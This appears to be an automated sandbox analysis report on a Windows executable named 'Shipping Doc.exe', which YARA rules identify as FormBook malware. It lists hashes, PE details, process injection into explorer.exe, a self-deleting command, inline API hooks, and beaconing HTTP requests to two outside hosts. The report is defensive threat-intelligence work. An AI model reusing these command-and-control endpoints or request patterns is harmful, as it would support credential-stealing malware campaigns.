MD5:	69206D3AF7D6EFD08F4B4726998856D3
SHA1:	E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:	A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:	CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.195385958745407
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	Shipping Doc.exe
File size:	1037312
MD5:	159d560ff64cdb2d130b1635f4123a49
SHA1:	5762036dd01f8a63ce29557c5c0464360500c7e6
SHA256:	065252f5ed5475c89d2bff7389554a4695a85900a7a75eb98170c6a372b33ea0
SHA512:	be415739b37b83d24c0d097680ddc2450be5de89f0b844c4b9790c039626f79ffac32f006b9c0febe37c84c519c703c65e03d2648c836b1f0dcd404c0026c4a6
SSDEEP:	24576:XB8ns9/deerxEjxbzXDusP8z5y8dWImtw:X4TuDcDImC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H..............................~.... ........@.. .......................@............@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4fe87e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xAAC44811 [Thu Oct 14 14:37:05 2060 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xfe830	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x100000	0x5d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x102000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xfc884	0xfca00	False	0.696450937036	data	7.2014231354	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x100000	0x5d8	0x600	False	0.4296875	data	4.13984531351	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x102000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x1000a0	0x34c	data
RT_MANIFEST	0x1003ec	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2019
Assembly Version	1.0.0.0
InternalName	RemotingSurroga.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	ControlLibrary
ProductVersion	1.0.0.0
FileDescription	ControlLibrary
OriginalFilename	RemotingSurroga.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/03/21-20:42:09.835215	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49744	34.102.136.180	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 20:41:49.096541882 CEST	49742	80	192.168.2.3	208.113.204.236
Aug 3, 2021 20:41:49.208533049 CEST	80	49742	208.113.204.236	192.168.2.3
Aug 3, 2021 20:41:49.208656073 CEST	49742	80	192.168.2.3	208.113.204.236
Aug 3, 2021 20:41:49.208802938 CEST	49742	80	192.168.2.3	208.113.204.236
Aug 3, 2021 20:41:49.320743084 CEST	80	49742	208.113.204.236	192.168.2.3
Aug 3, 2021 20:41:49.321682930 CEST	80	49742	208.113.204.236	192.168.2.3
Aug 3, 2021 20:41:49.321881056 CEST	80	49742	208.113.204.236	192.168.2.3
Aug 3, 2021 20:41:49.321928024 CEST	49742	80	192.168.2.3	208.113.204.236
Aug 3, 2021 20:41:49.321947098 CEST	49742	80	192.168.2.3	208.113.204.236
Aug 3, 2021 20:41:49.433867931 CEST	80	49742	208.113.204.236	192.168.2.3
Aug 3, 2021 20:42:09.702358007 CEST	49744	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:42:09.719989061 CEST	80	49744	34.102.136.180	192.168.2.3
Aug 3, 2021 20:42:09.720158100 CEST	49744	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:42:09.720345020 CEST	49744	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:42:09.738079071 CEST	80	49744	34.102.136.180	192.168.2.3
Aug 3, 2021 20:42:09.835215092 CEST	80	49744	34.102.136.180	192.168.2.3
Aug 3, 2021 20:42:09.835264921 CEST	80	49744	34.102.136.180	192.168.2.3
Aug 3, 2021 20:42:09.835561037 CEST	49744	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:42:09.835690022 CEST	49744	80	192.168.2.3	34.102.136.180
Aug 3, 2021 20:42:09.853218079 CEST	80	49744	34.102.136.180	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 20:40:06.545706034 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:06.570727110 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:07.272217989 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:07.310528040 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:08.516273022 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:08.540811062 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:09.286916971 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:09.320760012 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:10.395097971 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:10.419987917 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:11.509215117 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:11.541548014 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:12.723732948 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:12.750914097 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:14.740987062 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:14.773612022 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:15.797121048 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:15.829961061 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:16.690131903 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:16.715321064 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:18.600976944 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:18.637269974 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:19.751652002 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:19.786835909 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:20.660748959 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:20.688199997 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:21.508096933 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:21.535593987 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:22.683034897 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:22.717021942 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:23.486352921 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:23.511331081 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:24.316507101 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:24.343978882 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:25.550013065 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:25.578011036 CEST	53	57568	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:39.483503103 CEST	50540	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:39.524193048 CEST	53	50540	8.8.8.8	192.168.2.3
Aug 3, 2021 20:40:41.312944889 CEST	54366	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:40:41.345688105 CEST	53	54366	8.8.8.8	192.168.2.3
Aug 3, 2021 20:41:00.408565998 CEST	53034	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:41:00.441035032 CEST	53	53034	8.8.8.8	192.168.2.3
Aug 3, 2021 20:41:02.408351898 CEST	57762	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:41:02.444238901 CEST	53	57762	8.8.8.8	192.168.2.3
Aug 3, 2021 20:41:13.484704971 CEST	55435	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:41:13.528912067 CEST	53	55435	8.8.8.8	192.168.2.3
Aug 3, 2021 20:41:15.833672047 CEST	50713	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:41:15.875015020 CEST	53	50713	8.8.8.8	192.168.2.3
Aug 3, 2021 20:41:42.797089100 CEST	56132	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:41:42.844923973 CEST	53	56132	8.8.8.8	192.168.2.3
Aug 3, 2021 20:41:43.193022966 CEST	58987	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:41:43.239955902 CEST	53	58987	8.8.8.8	192.168.2.3
Aug 3, 2021 20:41:48.954216957 CEST	56579	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:41:49.091502905 CEST	53	56579	8.8.8.8	192.168.2.3
Aug 3, 2021 20:42:06.128948927 CEST	60633	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:42:06.182670116 CEST	53	60633	8.8.8.8	192.168.2.3
Aug 3, 2021 20:42:09.661616087 CEST	61292	53	192.168.2.3	8.8.8.8
Aug 3, 2021 20:42:09.698745966 CEST	53	61292	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 20:41:48.954216957 CEST	192.168.2.3	8.8.8.8	0xe08b	Standard query (0)	www.bigdaddy.fish	A (IP address)	IN (0x0001)
Aug 3, 2021 20:42:09.661616087 CEST	192.168.2.3	8.8.8.8	0x9ec5	Standard query (0)	www.davinescosmetics.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 3, 2021 20:41:49.091502905 CEST	8.8.8.8	192.168.2.3	0xe08b	No error (0)	www.bigdaddy.fish		208.113.204.236	A (IP address)	IN (0x0001)
Aug 3, 2021 20:42:09.698745966 CEST	8.8.8.8	192.168.2.3	0x9ec5	No error (0)	www.davinescosmetics.com	davinescosmetics.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 20:42:09.698745966 CEST	8.8.8.8	192.168.2.3	0x9ec5	No error (0)	davinescosmetics.com		34.102.136.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.bigdaddy.fish

www.davinescosmetics.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49742	208.113.204.236	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:41:49.208802938 CEST	6582	OUT	GET /amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR HTTP/1.1 Host: www.bigdaddy.fish Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 20:41:49.321682930 CEST	6582	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 03 Aug 2021 18:41:49 GMT Server: Apache Location: http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR Content-Length: 330 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 42 69 67 44 61 64 64 79 55 6e 6c 69 6d 69 74 65 64 2e 63 6f 6d 2f 61 6d 62 36 2f 3f 44 50 74 34 3d 62 79 34 39 6f 39 50 34 6e 62 75 54 75 4f 45 6e 32 79 38 71 33 30 51 4f 49 34 6d 43 32 57 67 52 51 50 73 54 69 4c 46 71 57 34 54 35 65 63 7a 65 58 52 56 31 4b 42 48 47 4f 41 6c 43 2b 30 48 52 35 6c 58 58 26 61 6d 70 3b 6c 38 42 3d 52 6a 41 68 52 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49744	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 20:42:09.720345020 CEST	6593	OUT	GET /amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR HTTP/1.1 Host: www.davinescosmetics.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 20:42:09.835215092 CEST	6594	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 03 Aug 2021 18:42:09 GMT Content-Type: text/html Content-Length: 275 ETag: "61048812-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xE3
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xE3
GetMessageW	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xE3
GetMessageA	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xE3

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Shipping Doc.exe PID: 1932 Parent PID: 5704

General

Start time:	20:40:13
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\Shipping Doc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Shipping Doc.exe'
Imagebase:	0x3b0000
File size:	1037312 bytes
MD5 hash:	159D560FF64CDB2D130B1635F4123A49
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: Shipping Doc.exe PID: 2148 Parent PID: 1932

General

Start time:	20:40:35
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\Shipping Doc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Shipping Doc.exe
Imagebase:	0xe90000
File size:	1037312 bytes
MD5 hash:	159D560FF64CDB2D130B1635F4123A49
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 2148

General

Start time:	20:40:37
Start date:	03/08/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cscript.exe PID: 2000 Parent PID: 3388

General

Start time:	20:41:03
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cscript.exe
Imagebase:	0xde0000
File size:	143360 bytes
MD5 hash:	00D3041E47F99E48DD5FFFEDF60F6304
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 3984 Parent PID: 2000

General

Start time:	20:41:06
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\Shipping Doc.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6040 Parent PID: 3984

General

Start time:	20:41:06
Start date:	03/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Shipping Doc.exe PID: 2148 Parent PID: 1932 Shipping Doc.exeCOMMON

Executed Functions

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419e13
0x00419e1f
0x00419e27
0x00419e32
0x00419e4d
0x00419e55
0x00419e59

APIs

